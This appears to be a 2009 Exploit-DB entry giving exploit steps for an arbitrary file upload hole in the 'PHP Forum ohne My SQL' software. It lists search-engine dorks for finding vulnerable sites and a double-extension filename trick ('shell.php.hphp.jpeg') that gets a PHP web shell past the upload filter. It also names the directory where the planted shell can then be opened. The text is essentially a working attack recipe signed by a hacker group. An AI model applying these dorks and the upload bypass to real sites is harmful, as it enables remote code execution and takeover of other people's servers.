PHP Forum ohne My SQL - Arbitrary File Upload

EDB-ID:

10757

CVE:

N/A


Platform:

Linux

Published:

2009-12-28

PHP Forum ohne My SQL Remote File Upload Vulnerability 

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : Powered by GL-SH DEAF forum 6.5.5 final. #
# [+] or dork:"PHP Forum ohne My SQL" "thema.php?board""
#####################################################

The exploit :

http://localhost/path/upload.php


change shell

shell.php.hphp.jpeg


Get now shell :

http://localhost/path/imguploads/shell.php.hphp.jpeg


and good luck :D

Thanks to : shooq hacker ..

#####################################################